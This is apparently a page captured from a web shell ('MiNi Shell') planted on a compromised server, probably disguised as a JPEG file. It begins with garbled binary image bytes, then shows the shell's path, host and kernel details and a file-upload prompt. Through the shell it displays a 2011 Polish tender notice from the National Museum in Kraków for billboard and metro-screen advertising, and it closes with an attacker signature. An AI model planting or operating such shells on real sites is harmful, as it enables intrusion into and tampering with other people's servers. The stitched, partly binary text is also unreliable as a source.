JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110419/119379-N-2011.html

<p class="kh_header"><b>Kraków: Przedmiotem zamówienia jest kampania promocyjna na nośnikach reklamy zewnętrznej typu billboard, citylight, citylight słup oraz na ekranach zlokalizowanych w wagonach lub na stacjach Metra Warszawskiego,  następujących projektów Muzeum Narodowego w Krakowie:
-	Wystawy Skarby hiszpańskiej Korony- lipiec - październik 2011 r.,
-	Wystawy Turner. Malarz Żywiołów - październik 2011 - styczeń  2012 r</b><br>
<b>Numer ogłoszenia: 119379 - 2011; data zamieszczenia: 19.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe w Krakowie , Al. 3-go Maja 1, 30-062 Kraków, woj. małopolskie, tel. 012 2955621, faks 012 2955555.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest kampania promocyjna na nośnikach reklamy zewnętrznej typu billboard, citylight, citylight słup oraz na ekranach zlokalizowanych w wagonach lub na stacjach Metra Warszawskiego,  następujących projektów Muzeum Narodowego w Krakowie:
-	Wystawy Skarby hiszpańskiej Korony- lipiec - październik 2011 r.,
-	Wystawy Turner. Malarz Żywiołów - październik 2011 - styczeń  2012 r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kampania promocyjna na nośnikach reklamy zewnętrznej typu billboard, citylight, citylight słup oraz na ekranach zlokalizowanych w wagonach lub na stacjach Metra Warszawskiego,  następujących projektów Muzeum Narodowego w Krakowie:
-	Wystawy Skarby hiszpańskiej Korony- lipiec - październik 2011 r.,
-	Wystawy Turner. Malarz Żywiołów - październik 2011 - styczeń  2012 r.
Przedmiot zamówienia obejmuje wynajem ww.  nośników reklamowych oraz montaż na nich plakatów dla następujących zadań promocyjnych:

a) kampania promocyjna wystawy Skarby hiszpańskiej Korony odbywającej się w Gmachu Głównym Muzeum Narodowego w Krakowie w okresie od lipca do października 2011 przeprowadzona w wybranych miastach Polski ( tj. Kraków, Warszawa) w okresie od 1 - 31 lipca 2011r. na nośnikach reklamy zewnętrznej typu billboard (504 x 238 cm),

b) kampania promocyjna wystawy Skarby hiszpańskiej Korony odbywającej się w Gmachu Głównym Muzeum Narodowego w Krakowie w okresie od lipca do października 2011  przeprowadzona w wybranych miastach Polski(tj. Kraków, miasta Górnego Śląska), w okresie od 1 - 31 sierpnia 2011 r. na nośnikach reklamy zewnętrznej typu citylight (120 x 180 cm), 

c) kampania promocyjna wystawy Skarby hiszpańskiej Korony odbywającej się w Gmachu Głównym Muzeum Narodowego w Krakowie w okresie od lipca do października 2011  przeprowadzona w Warszawie, w okresie lipiec - sierpień 2011 r. na nośnikach reklamy zewnętrznej typu citylight słup na Trakcie Królewskim w Warszawie  (127 x 237 cm) - łącznie 4 tygodnie,

d) kampania promocyjna wystawy Skarby hiszpańskiej Korony odbywającej się w Gmachu Głównym Muzeum Narodowego w Krakowie w okresie od lipca do października 2011  przeprowadzona w Warszawie, w okresie od 1 - 30 września 2011 r. na ekranach zlokalizowanych w wagonach lub na stacjach  Metra Warszawskiego,


e) kampania promocyjna wystawy Turner. Malarz żywiołów  odbywającej się w Gmachu Głównym Muzeum Narodowego w Krakowie w okresie od października 2011 do stycznia 2012 przeprowadzona w wybranych miastach Polski(tj. Kraków, Warszawa), w okresie od 1 - 31 października 2011 r. na nośnikach reklamy zewnętrznej billboard (504 x 238 cm), 



f) kampania promocyjna wystawy Turner. Malarz żywiołów odbywającej się w Gmachu Głównym Muzeum Narodowego w Krakowie w okresie od października 2011 do stycznia 2012 przeprowadzona w wybranych miastach Polski( Kraków, miasta Górnego Śląska) , w okresie od 1 - 30 listopada 2011 r. na nośnikach reklamy zewnętrznej citylight (120 x 180 cm), 

g) kampania promocyjna wystawy Turner. Malarz żywiołów odbywającej się w Gmachu Głównym Muzeum Narodowego w Krakowie w okresie od października 2011 do stycznia 2012 na nośnikach reklamy zewnętrznej typu citylight słup na Trakcie Królewskim w Warszawie  (127 x 237 cm) w okresie październik - listopad - łącznie 4 tygodnie,

h) kampania promocyjna wystawy Turner. Malarz żywiołów odbywającej się w Gmachu Głównym Muzeum Narodowego w Krakowie w okresie od października 2011 do stycznia 2012 przeprowadzona w Warszawie, w okresie od 1 - 31 grudnia 2011 r. na ekranach zlokalizowanych w wagonach  lub na stacjach Metra Warszawskiego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu nie przewiduje się złożenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie o spełnianiu warunków w postępowaniu. Metoda spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać zrealizowanie a w przypadku świadczeń okresowych realizowanie, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie  min. 1 usługi polegającej na przeprowadzeniu co najmniej 1 kampanii reklamowej obejmującej minimum 3 miasta wojewódzkie na nośnikach reklamy zewnętrznej typu billboard lub/i citylight) wraz z dokumentami   potwierdzającymi,   że usługi  te  zostały wykonane lub są wykonywane  należycie.

W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument potwierdzający spełnienie w/w warunku Wykonawcy mogą złożyć wspólnie. Metoda spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać , że dysponuje lub będzie dysponował następującymi nośnikami reklamowymi: 

kampania promocyjna wystawy Skarby hiszpańskiej Korony :łączna ilość nośników (billboard): 70 sztuk w okresie objętym kampanią reklamową zlokalizowanych w miejscach umożliwiających dotarcie reklamy do jak najszerszego kręgu odbiorców, główne trasy przelotowe, centra miast, przy głównych skrzyżowaniach, w okolicach centrów handlowych
 Kraków (nie mniej niż  40 sztuk w okresie objętym kampanią reklamową), 
 Warszawa (nie mniej niż 30 sztuk w okresie objętym kampanią reklamową);

kampania promocyjna wystawy Skarby hiszpańskiej Korony: łączna  ilość nośników: 70 sztuk citylight  w okresie objętym kampanią reklamową zlokalizowanych w miejscach umożliwiających dotarcie reklamy do jak najszerszego kręgu odbiorców, centra miast, przy głównych skrzyżowaniach, w okolicach centrów handlowych
 Kraków (nie mniej niż 40 sztuk w okresie objętym kampanią reklamową), 
 Górny Śląsk - pakiet minimum 3 większe miasta (łącznie nie mniej niż 30 sztuk w okresie objętym kampanią reklamową);

kampania promocyjna wystawy Skarby hiszpańskiej Korony: ilość nośników:  2 sztuki w okresie objętym kampanią reklamową zlokalizowanych na Trakcie Królewskim w Warszawie (nie mniej niż 2 sztuki w okresie objętym kampanią reklamową);

kampania promocyjna wystawy Skarby hiszpańskiej Korony: ilość nośników: 900 ekranów w okresie objętym kampanią reklamową (1-30 wrzesień 2011)  w Warszawie (nie mniej niż 900 ekranów w okresie objętym kampanią reklamową);

kampania promocyjna wystawy Turner. Malarz żywiołów: Ilość nośników: łącznie 70 sztuk billboard  w okresie objętym kampanią reklamową w terminie od 1 - 31 października 2011 r. -lokalizacja i ilości nośników w miejscach umożliwiających dotarcie reklamy do jak najszerszego kręgu odbiorców, główne trasy przelotowe, centra miast, przy głównych skrzyżowaniach, w okolicach centrów handlowych
Kraków (nie mniej niż 40 sztuk w okresie objętym kampanią reklamową), 
 Warszawa (nie mniej niż 30 sztuk w okresie objętym kampanią reklamową);

kampania promocyjna wystawy Turner. Malarz żywiołów:Ilość nośników: łącznie 70 sztuk citylight  w okresie objętym kampanią reklamową w terminie od 1 - 31 listopada 2011 r. - lokalizacja i ilości nośników w miejscach umożliwiających dotarcie reklamy do jak najszerszego kręgu odbiorców, główne trasy przelotowe, centra miast, przy głównych skrzyżowaniach, w okolicach centrów handlowych.
 Kraków (nie mniej niż 40 sztuk w okresie objętym kampanią reklamową), 
 Górny Śląsk - pakiet minimum 3 większe miasta (łącznie nie mniej niż 30 sztuk w okresie objętym kampanią reklamową);

kampania promocyjna wystawy Turner. Malarz żywiołów:  - ilość nośników:  2 sztuki w okresie objętym kampanią reklamową (październik - listopad 2011) 
Warszawa (nie mniej niż 2 sztuki w okresie objętym kampanią reklamową);

kampania promocyjna wystawy Turner. Malarz żywiołów: ilość nośników: 900 ekranów w okresie objętym kampanią reklamową (1-31 grudzień 2011) 
Warszawa (nie mniej niż 900 ekranów w okresie objętym kampanią reklamową).
W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument potwierdzający spełnienie w/w warunku Wykonawcy mogą złożyć wspólnie. Metoda spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie o spełnianiu warunków w postępowaniu. Metoda spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie o spełnianiu warunków w postępowaniu. Metoda spełnia/ nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W zawartej umowie nie jest możliwe wprowadzanie istotnych zmian w stosunku  do treści oferty poza przewidzianymi w niniejszym ogłoszeniu. 
Warunki i okoliczności uprawniające do wniosku o zmianę.

I. Zamawiający

1.	Zamawiający przewiduje i zastrzega sobie wprowadzenie zmiany w treści umowy w zakresie:
-   nazw projektów objętych zakresem niniejszego postępowania, 
-   terminów  określonych umową i jej załącznikami o ile nie wynikają one z przyczyn leżących po stronie Wykonawcy, 
-  zakresu zamówienia o ile nie wpływają one istotnie na przedmiot umowy objęty usługą( tj.  ilość plakatów, ilość wydarzeń i wystaw objętych usługą - do 10%)
-  sposobu realizacji zamówienia o ile wpływa on pozytywnie na realizacje umowy dla obydwu stron; (dot. warunków rozliczenia, terminów płatności i terminu ekspozycji plakatów),
-  ceny w przypadku zmiany ustawowej stawki podatku VAT.
      -  w przypadku wystąpienia zdarzenia losowego wywołanego przez czynniki  
     zewnętrzne,  których nie można była przewidzieć w chwili zawierania umowy, w    
     szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego    
     powstaniem szkody w znacznych rozmiarach, z powodu działań osób trzecich   
    uniemożliwiających wykonanie usługi, które to działania nie są zawinione przez  
     którąkolwiek ze stron.
	
Zmiana taka uzasadniona może być przyczynami organizacyjnymi i technicznymi a wniosek o zmianę przysługuje w ww. zakresie odpowiednio Zamawiającemu i Wykonawcy. 
2.	Zamawiający na powyższy zakres przedłoży propozycję zmiany umowy w formie aneksu.

II. Wykonawca

1.	Wykonawca zobowiązany jest do ostrzegania Zamawiającego, tak wcześnie jak 
to możliwe, o szczególnych przyszłych wydarzeniach i okolicznościach, które mogą wpłynąć na jakość usług (w każdy sposób) lub opóźnienie w realizacji usług. Zamawiający zażąda od wykonawcy oceny wpływu przyszłego wydarzenia i okoliczności wpływających na cenę umowną i na datę zakończenia wykonywania usług
2.	Wykonawca opracuje i przedstawi Zamawiającemu do akceptacji propozycje dotyczące uniknięcia lub zmniejszenia wpływu takiego wydarzenia lub okoliczności mających wpływ na realizację usług, jak też będzie współpracował przy wykonywaniu odnośnych zaleceń Zamawiającego.
3.	Okoliczności, o których mowa w ust. 1 i 2 mogą wpłynąć na zmianę treści umowy.
4. Procedura wprowadzania wszystkich zmian do umowy określonych w niniejszej umowie :  
     wniosek o zmianę każdorazowo musi zawierać:
1)	opis proponowanej zmiany (np.: opis proponowanych usług, oraz program jej wykonania),
2)	 wpływ na wykonanie usługi stanowiącej przedmiot umowy - np.: czas, personel, usługi zamienne, rezygnacja z części prac itp.
3)	 proponowany termin wprowadzenia zmian, 
4)	należy podać  jakie znaczenie ma zmiana  dla zamawiającego lub czy jest konieczna dla wykonania umowy.
5.  Wnioski o zmianę. Wniosek o zmianę składany przez WYKONAWCE musi wpłynąć do Zamawiającego w terminie minimum 3 dni przed planowanym wprowadzeniem zmian, pisemnie. 
Wniosek Zamawiającego składany jest do wskazanej w umowie przez WYKONAWCĘ osoby w terminie minimum na 3 dni przed wprowadzeniem  zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeum.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Narodowe, al. 3-go Maja 1, 30-062 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2011 godzina 10:00, miejsce: Muzeum Narodowe, al. 3-go Maja 1, 30-062 Kraków, pok 050.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com